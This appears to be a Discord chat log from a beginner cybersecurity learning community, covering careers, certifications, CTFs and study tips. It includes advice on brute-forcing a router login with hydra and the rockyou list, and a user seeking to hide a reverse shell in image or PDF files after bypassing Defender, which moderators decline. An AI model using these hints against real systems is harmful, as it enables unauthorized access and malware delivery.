#general

Please don't help with coursework - even suggesting things could violate the honor code of that school, and we cannot verify that they are able to ask for help with any part of the assignment.

my b bro

Ah alright

Thanks for suggestions though atleast @sand mason

Gave +1 Rep to @sand mason (current: #1344 - 3)

Does anyone know how to hack into router? I am trying to hack into admin access of my home router without knowing the password. I have tried few stuff but nothing seems to work. If anyone knows any good source i can follow then can you recommend it to me?

If it's your router, you can factory reset it.

hydra?

Ffuf would also work

If it's a leased router from the ISP, you are probably not legally allowed to ahck it

I am doing this just for fun. I wanted to learn how to hack a router, to be more specific? So, yea reset isnt an option for me. lol

i tried to brute force with hydra but it didnt work

Unless you are confident in your wordlist, bruteforcing is a waste of time.

didn't work as in the password wasn't in the wordlist, or that it wasn't properly processing?

is it a login page or like a http auth user type deal?

i dont want to hack the router itself but was intrested on how would one getinto admin control of my router. i have changed the defult password so i wanted to see if it is still possible to hack it someother way.

well you should be able to brute force it if the pw is in a wordlist. Even if it does some type of block via cookie, you can set hydra to create a new session for each attempt. Was the password in your wordlist?

any other vectors would be based off recon and enum for that specific system

i downloaded a wordlist called rockyou so i am not sure if it is in the wordlist or not. But i dont know how to creat a new session for each attempt, so do you have any resources to help me teach it? I am doing this to learn new stuff so, please.

That's not going to help with your router bruteforce, unless the password is actually in there.

cat rockyou.txt | grep "<password-goes-here>"

For using a tool like hydra, the password actually has to be in the list you use. If you picked a strong password, the likelihood that it's in rockyou is very very very low.

or just add it in the top of the list/in a new file and try it where you know the password is in the list

other than that, you would have to do some type of a ruleset, like wordlist + mapping for more advanced brute forcing

changed the wifi password to asdf8842 to play around with that before
(note: that wasn't the password, tho same format)

chat when i say to my friends that i am into cyber security, they ask me to hack their ex's account 😭😭

what should i say

That it's illegal, and a violation of the account TOS.

tell them to move on

but is it really possible?

i always wanted to know, is there vulnerability exist in big companies to exploit and gain access

It's not a good area to explore. When you use those internet services, you don't actually own the account. It's not really yours. The TOS you agree specifically prohibits trying to access the account that way.

hey guys

anyone here good with bloodhound?

I didnt got it? can u explain in simpler way

i think recently facebook had a bug that granted access to a few of their servers with lateral movement. It's been patched, but the guy found it doing bug bounty

it happens but it's not common

Hacking account like social media = illegal. Don't do it.

also he was working within defined and legal scope, as I should probably point out

Yeah i wont do it, im more interested in bug bounties

and also, lets say if i learn to hack by some way, if i try it out on my account would it still be illegal

Step 1 to bug bounty: Make sure the company has a bug bounty program.
Step 2: Obey the rules of the bug bounty, including scope.
Step 3: ????
Step 4: repeat.

https://tenor.com/view/cat-fbi-federal-bureau-of-gif-8514161478359178167

Yes. It would still be illegal.

Ohhkay

yes, bug bountes exist

and yeah one more question, i have mac, but i wanna do pentesting?

https://bugcrowd.com/engagements/
https://www.hackerone.com/

so should i use vmware fusion pro for parrotos/kali or mac is safe

only hack your own hardware/software that you have full rights to. if it's online, you don't own it and 99% don't have explicit permission (sans tryhackme/hackthebox)

Gott itt

HackerOne is my favorite out of the two

i got beef with hackerone

are this for bug bounties? or vulnerability research

they put my bug as a dupe when it's not possible for it to be one

bug bounties

also good vulnerability research

Doing pentest independently is not recommended. There's a lot of ways to get yourself in very deep legal trouble if you do not have a good lawyer and a very solid business plan. You are much better off working in other areas of IT to build your experience and knowledge before doing that.

ohhhkayy

😆

bug bounties, but hackerone also has a learning + ctf subdomain

New fear unlocked

hacker101 i think

well im still learning

this........ isn't true, bug bounties exist and have "safe harbors"

if you mean as your own company that is kinda skethcy

Bug bounty is not pentest.

bug bounty is literally web pentesting

It's related but it's not quite the same thing.

i get what juun is saying, like you're not looking to actually get full blown shell in bug bounty

I'm involved with setting up bug bounty processes at the current company I work for, and I lead our pentest team. I also liase with our 3rd party pentest vendors - the rules are different

at the most a PoC RCE

i'd just say its web pentesting with less scope

is mac good for learning pentesting and other tools

or a vm will be requierd for linux

any OS works fine

you can pentest solely on windows if you want

ohhkay

Can you guide me a path if you have any? it would be a great help

I would still recommend using a VM for all your pentest activities though. Whichever OS you test from, it's a somewhat common deliverable to hand over the VM image to the client. Wholly dependent on whether the client wants that as a value-add to the engagement.

portswigger academy -> dive into bug bounties and learn by doing, pwnfunction is a great resource on youtube as well

DVWA and metasploitable are great for learning. Or BWAPP too

My advice is to learn network or system administration first. Once you understand how to secure a device, you'll know good places to look for testing.

https://tryhackme.com/hacktivities

im doing from here currently

like, jr pentesting, web penting, addvanced web pentesting then red teaming

https://www.youtube.com/@PwnFunction/videos

thats the path in that?

will i miss something important from this

is metasploit even used in actual engagements?

Second the portswigger once you have some knowledge. If the phrase 'CIDR notation' or 'IDOR' don't make sense, you probably aren't ready for pentest.

idk, but metasploitable is a system you run in a container that you can use to practice pentesting

not msfconsole

I've used metasploit in engagements. Not for webapp, but for network and other services.

fair i guess

but yeah i highly recommend pwnfunction, videos are somewhat short and teach you a lot and arent boring

any playlist?

i suppose you could use msfconsole tho. if it works it works, right?

all videos, theres like 20 or so

I'll add that I don't use it every engagement, and it's kind of a swiss army knife of a tool. It does a little bit of everything, but it makes certain things more difficult than they need to be. But it's a decent enough starting place.

some are kinda old, but its mostly conceptual and expalanation

if im sure bug bounties are for web pentesing only right?

This chat is nice

not always!

some are hardware based

or app based

90% of the time they are web

Depends on the program, and what's in scope. You have to read the scope very carefully.

some of them are just stuff like code review

hello everyone

can anyone suggest me how to gain experience in cybersec becoz no company want to give job for fresher cybersec guy

find a helpdesk job first...work your way up

get into cybersec

What are the differences?

Yeah one- two years in help desk and you'll be on your way

Bug Bounty doesn't usually allow actual penetration into the target system beyond surface level. In most (but not all) BB programs, if you actually get a shell you have gone way beyond a simple demonstration of the vulnerability

Targets are also much more rigidly defined in bug bounty, with much less flexibility on scope.

can you suggest some help desk job ?

Ok that makes sense

hi

Yeah it’s just called help desk my friend. Just search for help desk

i am totaly confuse in my life !

It’s the entry level it job

I guess being a field tech is also another entry level it job

Data entry

I wouldn’t consider data entry an IT job

..

Heavily depends on the context. Data entry is important in IT.

If you have to have Technical Experience in IT to get a data entry position I'd consider it an IT position; Especially when it's in the context of a helpdesk, or any administrative role where you're a Data Entry Professional or wtv. I'd consider it an IT job.

Should I make any type of project college.
Does anyone have any idea about what type of project.

I think people forget there are multiple areas of IT. Not everyone is doing the hands on stuff. Sometimes you're just answering phones and helping those who are less technical operate their equipment. (Speaking in a HelpDesk Position GENERALLY speaking in Level 1 Support Role)

It all depends on what your role is within the company. People have their places, don't let someone deter you from applying to a data entry position.

And I wouldn't call that "IT" but it still counts as it somehow. (I know it's the premise but I find it mind blowing that sometimes simple explainations can be regarded as an IT service)

Yeah, I have experience in the hands on part.

And do you find it fun? I have a friend that keeps getting slammed w bitlocker unlock reqs

haha

but uh yeah, sometimes it's fun.

People don't understand what they want, It's a position you have to really be interested in.

I would love to be doing that back and forth

😭

For example you can work on laptops and various computer systems, one time I even helped build a bunch of computers for a company.

othertimes it's sucking the life out of you 😭

but mostly fun

at least in my opinion.

And that's fun, did you get to pick the parts?

or just assemble?

Actually a bit of both.

Either way it's still fun

Building workstations is the best 😭

But running wire, oh that's a whole different story.

😭

yeah that's fun..

being there all day, from morning to dusk.

Wait until you have to relace it

Then you have to deal with the old IT people's mistakes, look at it, start laughing uncontrollably, and then realize you're the one they hired to clean up that mess.

If you do it right, you don't need replace it for a really long time--unless somebody cuts the wire or does something laughably stupid.

..which is bound to happen eventually.

gn everyone

Goodnight! :3

I'm not talking ab that; more along the lines of having to trace cat6 using those wands 😭

all though that is quite fun, I'm sure it's hilarious to see the last person's unorganization 😭

ayoo new day new me

good mornin

gm

hyd

bruh on the website it says im apprentice

reverify

or wait for the bot

https://tenor.com/view/anime-tea-drink-cute-bangs-gif-15778933

Gm

afternoon!

I wanna learn something that i haven't, Can anyone teach me something that could be too beneficial for me to learn .. Umm?

I recently was studying on how to learn effectively on cybersecurity and I was curious on how you guys study it.

Practice, Patience & Experience..

yeah

i guess

but I speaking study techniques

I was learning on effective study techniques for cybersecurity and it made me stop using notes

so I was curious on how other people study and what techniques they use

i watch videos jerk it and do it rinse and repeat

anyone can tell me ....how to solve ctf ....any write ups for beginners ? @cedar hearth

then i write it on paper 12 times till it becomes engraved im my head and its the onlything i dream abut

oh interesting

after that i think like im some greek philospher about twtf i learned the day before

then i move on

huh

i guess so

typically I dont write on paper because it makes you forget faster

i passed my oscp cuz of it :/

oho

interesting

thats why you write it more than once

but its not healthy tho

yeah

i cant talk to women anymore

im a women

trustme

i mean irl

oh

yeah no dw

hey mori

uhhh

hi

can you tell me ...how to solve ctf ?

any write ups for beginners

ok step 1

the reason why I think writing on paper is bad is because when you remember the knowledge and write it down you kinda let go of remembering it.

read the question

once you read it

try seeing what it wants

use the ai

then spend 1 hour googling what to do to achieve your goal

the tryhackme AI gives pretty good tips

then read writeups on bing.com

ai is bad

haram

oeuf

oui

its good if youre lazy

otherwise dont use it

im lazy making flashcards

and its not reliable

If I wanna get your experience. How can i.?

okay thanks

Gave +1 Rep to @primal obsidian (current: #2729 - 1)

i have 3 months of experience 💀

idk i just read stuff

dont waste ur time on thm ig

cuz i barely learned anything

then Where you learned most thing?

oscp course

do u have premium

no

makes sense lmfao

i got premium and it works fine

I mean. Where you started when you started.?

that is very expensive

yea i saved up hella

idk like 2024

i worked very hard

im failing school rn

I am dropout from 11th

dont gotta worry about school ig

Hell Yah.. It doesn't matter ig

ehhhh it kinda does when getting a job since a GED does look good

but then thats only entry

So. It doesn't matter for me, I Never want to do job ig...

what do u wanna do

become an illegal APT or smth??

The problem i am facing, Someone never had to do face ever.

what problem

<--

?

I guess just leave the personal problems... BTW can you teach me something that i can't learn somewhere else ?

sigh ok uhh

dont use CBC

🫶

and dont use ECB ever

use GCM or CCM

Sometimes life is like this dark tunnel. You can't always see the light at the end of the tunnel, but if you just keep moving... you will come to a better place.

and cipher streams are faster than block streams

😭 I don't even know what are they

cipher modes

chacha over aes cuz its faster and no one is cracking either

🙃 🫶 ❤️

there you basically got your crypto basics on hardening ig

that light might come from the train entering

beware

Oh.. Got it!

😭

You Broo

yea

uhhhhh

vmware is cool

i dual boot cuz im boss

I just uninstalled 17.6 and reinstalled 17.5

ok

My life ended up when i choose this industry as my life ig

ok and

what about it

you will always be forced down a road

its natural

https://tenor.com/view/brian-family-guy-irl-stare-gif-6797212319157772367

Scary huh!

no

idk what to say

and im bored

and im dehydrated

I am just trying to setup vmware.. Can you help me.?

i havent used vmware in like 4 months

Drink Drink..

youtube it or smth

vmware is well documented so gpt might help

Ohkie

ok ima go goon to some lang internls

bai

BAAYI

can someone help witha bloodhound analysis

Someone think of an excuse for me

My family are trying to get me to go there today and I don’t wanna go

https://tenor.com/view/hide-spongebob-sand-bye-gif-17200435

Does anyone know at what difficulty level SAL1 is compared to the SOC Simulator challenges?

Say for example, will it have alerts from easy, medium and hard, or only easy and medium?

You'll be using the Soc Ssim, take from that what you will.

how can i join general vc it's locked

@obtuse swift

This review is good, without giving any important information about the test away; quite a long review but it's worth the watch https://youtu.be/nSrwoxHvHvA

Will check it out, thank you

Hi, I’m currently studying for the CompTIA Security+ SY0-701 exam using the CompTIA Security+ SY0-701 Certification Guide by Ian Neil, along with the CompTIA Security+ Exam Prep app by Than Hung. To increase my chances of passing, I’d like to add another resource, but I’m torn between Professor Messer’s Notes + Exam package and Jason Dion’s Udemy course. Which one would you recommend and why? Thank you.

A lot of people are recommending Professor Messer . Try to ask guys in #cyber-and-careers channel they can give you some great advice 🙂

Professor Messer, Always! <3

Gotta love when the burner dies

moning all

what is the topic of the moning 😄

Planned on taking the burner (phone in picture) with me to China, but guess it's dead :/

looks like it need CPR

Yeah, the devs of the OS looks like to have remote wiped it, guess I just gonna install a new OS on it

Eh?

Graphene devs don't have the ability to remote wipe phones.

Thanks

Gave +1 Rep to @cloud quiver (current: #1 - 3799)

Thanks

AFAIK, I don't think anybody does, as that would be really careless.

It's not graphene on it

It's some others that put their own stuff on top of graphene

Point still stands, if a dev has the ability to remote wipe a device, they have remote access.

I'll refer back to my blog post
https://zestfulzodiac.substack.com/p/from-secure-to-exposed-a-forensic

It's a drug phone OS i reverse engineered, it uses a subscription base, and if your subscription has ran out for too long and they detect the phone being on afterwards they'll remote wipe it

So it's the app that does it.

Hi

Possibly

Hi! I'd like to participate in the Hackfinity Battle 2025 but I don't have a team! Anyone need a rookie for their team?

Going from the blog post, it's not quite a remote wipe, but more so a "safety" mechanism being used on the phone by the app, which could also have been done by dropping it, using a different cable etc.

#1347596231551225887

please.

Do BTL1 holders get to do SAL1 for free? 👀

Yup, with restrictions.

#announcements message kind of

All information is in the post.

Yes, but this was caused by a remote wipe, you have a remote wipe token that if the phone gets sent in a notification or message it'll wipe itself, I have gone in and removed all instances of possibly getting it wiped by dropping and other methods they have, only way it could get wiped was if it was from their servers

That just leads to the question of you knew the phone was past the no subscription stage, why are you using it for a travel to a foreign country 😅

As a backup, didn't know they would wipe it past the subscription, but decided to bring it as a second for Chinese sim card and testing

Especially since I have had it turned on past subscription before where nothing happened

SYN'in til I ACK 🗣️ 💯

I cast firewall! 🧙‍♂️ 🔥

You just burned my securityOnion,

It was super effective.

https://tenor.com/view/cat-orange-spin-hat-one-brain-cell-gif-2745719316163357325

Connection timed out

Scrubz's character development needs to be studied

https://tenor.com/view/wizard-cat-wizard-cat-by-demonwolf-mage-cat-magic-cat-gif-2835561615176791073

Is there anyone here who knows how to embed an cmd/ps/javascript/python reverse shell script that is executable into an jpg/png/pdf file ?

Scope of it ?

Stega something

Is it for THM ?

What are you doing? 😄

Hey scrubzzz

How you doin man

You are a significant internet figure for me

Hopefully for the right reasons. 😅

You help me advance and finish the first 3 modules and I got a job

But this is private project that I try now

Uh, what's the private project, that could depend on the community rules if we can assist you or not. 😄

I figured how to sort the port forwarding problem when trying to reverse shell outside of my local network , it works . And for educational purposes I want to check if I can make it work also when the script is being transferred as a jpg/png/pdf file

Is it going to run on a computer or a server ?

On my windows VM

Or my windows host

From listener in Kali

You may need to "fake" the png/jpg/pdf file, I'm not sure if you can run an executable from an image itself

I tried macros with pdf files but even with all defender off on windows , it is still alerting

Hey i'm new here

Well yes, that's considered maldev, quite normal windows defender will trigger

If you are trying to bypass windows defender this is another story, and I'll not help on that

I know there are ways to make it executable from image or pdf, I watched some online tutorials but they didn’t work

No im not trying to bypass it I already did, I am trying to make the working script being executed after op wining the image

After opening *

The executable will still be blocked from windows defender I think

Or at least, it should

No because the script itself is creating a cmd file that is creating a powershell file that executes itself therefore no need to downgrade ps execution policy

This I checked

Idk man this smells more and more like maldev and not a simple project

It’s for learning

Yeah, for tips and tricks on how to bypass defender, this is considered an advance topics,

yes you can kinda do js in pdf files

it's complicated

polyglots also exist and may be useful

Before going further, please respect rule 9.

If a pdf runs doom, it can run anything lol

Interesting

https://doompdf.pages.dev/doom.pdf

can i get access to advanced channels if i have a cyber talk

that i presented

funnily enough i had the idea to do this before it released i just was too busy :/

That would be the discretion of Jabba.

in a sandbox

my job is paying me for OSCP scrubz

to do it

Nah man whoever did that is
1 crazy
2 unemployed

Lmao

Im glad to hear that, once you pass, you can get access to the advanced channels.

There is always a * at the end hehe

i was gonna make doom using mspaint as an IDE

i have BSCP of burp

from work

also OSCP is windows?

i heared OSCP is much harder

if so i'm pretty sure id fail OSCP but would pass OSWE

oscp is by offsec

i am not ready for oscp yet

It includes Windows

ahh

its a 24 hours exam

5 machines

if you fail the AD machine you fail the exam

ooof

Top tip, (Not that I have OSCP)

Manage your time, and take breaks.

@near sapphire Hello!

i see you lurking

what do you mean

continue your projects man

gift me nitro bor

no monies

my nitro was gifted to me

Don't just go guns blazing.

i gotta finally work on that project i've been meaning to do

get a job

and hate myself doing it

i'm trying :(

im trying not to learn stuff that i dont have time to go in depth to

and in work they open me the OSCP libraries with more people and we learn together

like building a hypervisor and a mouse driver will totalllyyyygyyyy be fun

@sick lance is maldev still maldev if its ethical and safe? what classifies as maldev

If you have to ask, then best keep it in the advanced channels

so i have to wait for jabba to see if my cyber talk is good enough to get in

i could grind out thm but lazy

i am to :{

but for now only

yeahhh :/ what's your niche in cyber?

everything :} about cybersecurity and computers

Good morning everyone!

Nano isn't on SO by default,

yay for vim

Maldev is maldev, in the case you are using it for ethical use it would fall under Ethical Maldev or Benign Malware an example of this could be Cobalt Strike Beacons

but my target is to master everything about (cyber warfare)

what about vm hardening with a rootkit

i dont know why but i loove it

oooh gl

Probably best asking a moderator or admin about that. not a community member who's just here, and as James pointed out, if you have to ask...

Depends on your use-case

good morning!!!

hi

guys who started with programming lang first in cyber ?

better malware-analysis on vm detection malware

start with C/C++ please

you will thank me later

did you start with that

i started with javascript and i regretted it

fair

i already learned C and start with python but it will be the next C++ and assembly after i will going depper in cyber

that important to

Javascript,python are the easy get into cyber languages

i dont search for easy ways i want to understand everything dude

but learning C/C++ teaches you fundamentals about comp sci, which makes learning new languages easier

not only know how to work

As long as you're using it ethically, within legal regulations, and for legitimate reasons, it would generally be considered ethical malware development. However, you should always obtain proper authorization before deploying such software, unless otherwise explicitly permitted

that correct

you'll look at js and python and think they are terrible but will deeply understand them

now i learn python and its soo easy cuz i learned C before

yeah of course

yep, and you have info on data types etc

but in the first i will have some problems right with writting scrips

learning a new language after the first one is just syntax

after that fellings will gone right

i went from js -> python -> go -> c++ and it was horrible

Free wo

Rm

I started off with Python. I might pick up c++

so it, it's so worth

you mean was so strong

Hmu with a c++ path and I'll get to work boss

yolo projects?

i think horrible road make you better ?

Whatever that will get me started. I'm about to sleep, not in the mood to search things lol

lol

i wouldn't say better in my case, when i switched to lower level it was very different than what i've done for years

that's why opposite i feel is better low level to high level

concepts are hard to learn at first

but everything's easier

hmm

with time and practice everything will be easy like you says:>

yeah it just takes time

thank you dude for advices

C/C++ is the foundation for like everything

so after that you good

yeah i try to be better in C scripts also

can i say i think basic is befor that 😄

cuz it will help me in cyber so much

and i lvl up in daya structures

make sure to learn about memory and stuff like that and not just scripting

data

honestly haven't touched BASIC

It's best to begin with the basics when you are first starting out, but than again it depends on your pathway

i i have finish this cs50 course 2 times

chat should I spend the rest of my day tomorrow hacking or coding

go get us the win in pico

and now to understand more everything i will finish it one time more

back in the late 80 start 90 i learn basic on my c64 😄

carry me my dude

Who's doing the new CTF?

I'm in two minds if I should take part or not, (bonus I'm a student).

ohhhh one of thoseeee

can we solve CTF,s if we start new in cyber ?

why wont u participate

yes! i found them to be great at learning

hmmm what do you meen my ages heheh

I may have more fun watching from the server.

really

I would definitely suggest doing, even just as a learning experience

ok

😭 i only know of one of those from a museum here that shut down

Does anybody need one more student in their team for the hackfinity Battle?

they teach you new concepts and technologies etc, and you have to learn on the fly

#1347596231551225887 is a better channel.

Thank you

Gave +1 Rep to @sick lance (current: #2 - 3492)

10 print "hello world"
20 goto 10
run

which website bro

this CTFs

ok wait i remember this

you cant watch and play at the same time?

If I get too invested I won't. 😄

picoCTF is going on currently but a bit hard, picoGYM is 24/7 and teaches a lot

the thm one is going on idk for how long that's a scrubz question

i will look at that and come back

the CTF is not for my skills yet im to new in this

it is beginner friendly

even if you are brand new i would suggest giving it a try

then i need a team etc

if you don't know how to do it research as much as you can until you get it

if you don't plan on being competitive just do it solo

https://play.picoctf.org/login?redirect=/login

this one

watch your place go up

yep

i leik big numbers go up

ok solo better i think for now just

after i learning more i will chose team to .....

@proper sable if ther is a dude the need a padawan im on 😄

?

i know it's a star wars reference but never seen 😭

You should tbh

I'm excited for the cloud challenges

if ther is some the like to be my teacher then i like to be the student

I have zero experience in those so I won't get them, but it'll be fun anyway

ahhh, i'm down to give advice when i can

might have to participate just for cloud stuff.......

i need an excuse to learn cloud

i have 0 experience on aws hacking

actually i have no experience in aws whatsoever

only experience i have on aws hacking is cognito cloud identities

cool can i add you on my frinds list 😄

sure

im new in linux ish i know a litte and im trying the Penetration road on THM

Onion will know pain, for it no longer makes me cry by refusing to work!

T -1day for my 3d printer is comeing home

scrubz villain ark

any new room ??

For THM, no.

What's this?

Security onion.

could you explain ?

It's a network security monitor.

With threat detection.

hmm that's great

i thought it would be linked with tor

I don't use tor.

BTW.. how can i join that general vc.?

You need to verify your account

How can i.?

Above link.

just go and message the thm bot

Thanks!

Gave +1 Rep to @sick lance (current: #2 - 3493)

Im now a networking nerd

nice! 😊

Boarding in 20 minutes

safe flight bella!

Thankz

do we have a channel just for CTF

yes

Hey guys,
I’m a beginner pen tester from Egypt, and I’m looking to put together a small team to learn Pen Testing together, grind, and improve. The idea is simple: practice, hunt for bugs, do CTFs, and just keep getting better, learning on tryhackme website.
If you’re down to build something solid and actually put in the effort, hit me up. Let’s see where this takes us. 🔥

there is

??

#1347645518032928839

#1345108873584836618

you can customize your channels

cool how 😄

do you have a bar called get started ??

ohh wher

go to id:guide

there will be option for it

#1347217239492919346

thanx mate

thanx mate

wish you have a good learning sections

hell ya hehe i have no clue what to do soo game on

you could start with cyber security 101

ya it well might be a goood ider i guss

@pseudo egret look like i need candy to eat and some more coffe

helloo

@dusty thicket hello ther

what you doin

yha the caffine rush

it would be fun

brb need to go shoping

where are you from ??

@pseudo egret

can you turn your mic in dc

??

can't bro sorry but my mic is complaint

if you want hop in to dm

mine says surpressed

aight

add

me

denmark you

Knew it from the name

well you might hear abut greenland ;D

india

Well as a Dane myself it's a 7th sense

yo any from india ?

Yep

yo mate

hehe i love the rulles on CTF ( you most not do that and that ) hmm all of that i dont know how to hehe soo that is the easy part 😄

Americaland?

@gray sonnet @sturdy pike

Ye

This one

Hi..

Yo

Exiftool on Linux is not precise. I try cat it's more advanced

...Two different tools?

ad enumeration romm in thm , openvpn file is tweaking rn

not able to connect

The quick brown fox jumps over the lazy dog

openvpn redad.ovpn
2025-03-09 19:11:42 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2025-03-09 19:11:42 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
2025-03-09 19:11:42 OpenVPN 2.6.13 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-03-09 19:11:42 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-03-09 19:11:42 DCO version: N/A
2025-03-09 19:11:42 OpenSSL: error:0480006C:PEM routines::no start line:Expecting: CERTIFICATE
2025-03-09 19:11:42 OpenSSL: error:0A080009:SSL routines::PEM lib:
2025-03-09 19:11:42 Cannot load inline certificate file
2025-03-09 19:11:42 Exiting due to fatal error

use sudo

#site-support

root privileges

Yes

same issue even so

I just start hacking I think 1 month ago

I'd appreciate it if you moved this to #site-support

moved it man

hi , i have a question , the data moves from layer 7 to 1 after before transmission via L1 . how the three way handshake occurs jn transmission layer , before Network layer where you should know the ip adress of the remote host?

are layers work together or work in order ;( im struggling in understanding :D

or im wrong in all what i said 😂

They work together

For a website, for example, you know the URL
The URL is broken down into a hostname
The hostname is resolved with DNS into an IP
HTTP request is sent to the IP+port

red whit and blue land lol

hey, does anyone have suggestion for challenges to complete after finishing the cybersecurity 101 path?

Transmission begins at Layer 7 (Application) and moves down through each layer to Layer 1 (Physical). When using TCP, the three-way handshake occurs at Layer 4 (Transport); here, the client sends a SYN packet to the server, the server replies with a SYN-ACK packet, and the client responds with an ACK packet to establish the connection. While the process "moves down through each layer" it's more accurate to say that the layers work together rather than in a strict order to transmit data

This one 🙂
https://tryhackme.com/room/basicpentestingjt

thanks :)

https://tenor.com/view/murica-gif-11967745087810666193

lol

https://tenor.com/view/merica-bald-eagle-eagle-america-american-gif-2277187416326490184

murica ppl

understood thank you

Gave +1 Rep to @naive violet (current: #3 - 2266)

all clear , thank you 🤠

I have a question, would you suggest moving onto the OpenVPN setup instead of Attack Boxes from the beginning or am i gonna incounter configuration issues on my kali? I mean, are there going to be lots of problems or is already set up for these kind of things??

I know i got the tools but maybe they got to be configured

I would definitely recommend you to use your own Kali vm . It has more tools pre-installed than AB . VPN setup is a relatively simple process. You can learn how to do it on the link below 🙂 .
https://tryhackme.com/room/openvpn

Alright, i've just done the metasploit introduction room on my own kali since it needs just some simple research for the tasks and it's a whole different story since metasploit loaded in less than 5 minutes

hello

Hi man

hi hello hello

it's me

Btw i have another thing, it's not THM related but on kali linux when i'm in discord and streaming my screen the audio gets all stuttering to the point where i cant hear nothing, has anyone had this problem before? On windows i havent got such problem and i dont know what could be causing it..

purple guy from the bite of '87

anyone knows about sha1 hash collision words

can't wait for the CTF to start\

Linux's version of Discord is still lacking, some fixes off the top of my head could be turning off hardware acceleration or adjusting your audio sample rate but there are a few possible causes for the issue, so it may require some trial and error to find the right fix

which CTF

Where do i turn off hardware acceleration?

#1347217239492919346 🙂

Discord Settings > Voice & Video > Hardware Acceleration

hey anyone know what vocabulary i should be using to to think of a list of common applications and services found during penetsts? things like jenkins, drupal, tomcat, etc?

do you recommend me that i install gawk?

CMS?

the THM one

in about a week

Depends if you need it or not, it's your software 😁

computer media services?

content management system

ahhhh

i've been trying to take pretty good notes for all these boxes and such i've been doing - it's good , in my opinion, to have some of these baddies ready to go

I love Tryhackme Thank you so much for giving as this great gift of accessible knowledge well created.

thank you badbunny for your musical contribution

and a que lo que to you good sir

I worked as customer service and tech support, don't call people idiot, because you can't explain yourself 😂

This is likely someone trying to help someone they know, and the person they're helping is likely just teasing them. This has been a common thread in Windows support for 30 years

When I read the first sentence I thought this conversation is doom 😂

t minus 200 days

Greaaat

Wow Nicccee

I used to do tech support for a lot of old people, and then when I finished work, my mum used to call me with tech issues 😛 Actually is not that hard if you know how to guide them, ironically I had more success with old people than with young people. Young ones think they know everything and don't follow your instructions, if you know so much what the f you contact us 😂

i got 0xE yesterday 🎉

0XE
Expert right?

Guardian

🥦

🦖

smh smh...

I want to be like this

😭

I just end 49 rooms

Congrats , great job 🚀

SCaLE talk, misinformed

Your streak overflowed 🤣

LMAOO HAHAHAHA

just times 66 days more to have a nice streak

What's wrong with (Tr33r0otS!!) as a password?

haha streak -3

adding them to SecLists

From were u foumd it

this leetspeak is already in John rules configuration file

watching the video

Yo wahhht

"7r33r0075!!" would be a more accurate leetspeak variation of treeroots

is hackfinity starting on the 17th?

If that's what the event says.

something went so wrong

lmao

the kid giving the talk is arguing for pass phrases

Maybe something related with planning 😉 😛

they succeeded in planning

what do you think of shellgpt

no thoughts

anyone know where shadow can source some indium

wanna try chewing it

Hey everyone!

I can tell u something everyone

I lvu💕 u are beautiful u Are smart u are greatest

U are THE BESST ONE

YEEEA that's what im talking about

🥦

This for u everyone

anything with gpt on it, is a brain rot disease 😂

hmm oki 😄

Kinda needed it, thanks!
Have a cookie box 🍪 🥡

Gave +1 Rep to @leaden marsh (current: #2729 - 1)

Truth, I refuse to use all that crap

Totally forgot that this trip is on company card, plane wifi!!!

wifi )))

🛜

🥦

🍪

how are you doing sudo?

First time flying Qatar airways, I like it

🍪

i am true sudo

staying warm like these mice

mammoth genes

🦖

💕😁

they look warm, who's the other one?

i am sudo hex

I will sleep with them

I will put my head on them

you are so original

Hello sudo hex 👋

no idea, this image is from 404 media story

😄

And then feel warm to my head

😁💕

What brings you to the TryHackMe community? 😁

I will put them in my blancket

lmao, that's warm

And then sleep

💕😁 .

been the blue team SOC level rooms

It's always hectic, studying and stuff

i found this discord server on the discovery page and i use tryhackme to help me learn cyber sec

🥱 I'm sleepy

Go sleep

Later everyone, wanted to talk but can't today

Awesome sauce 😎 Well I'm glad to have you here

Jabba

like a Flock of Seagulls ?

I am bored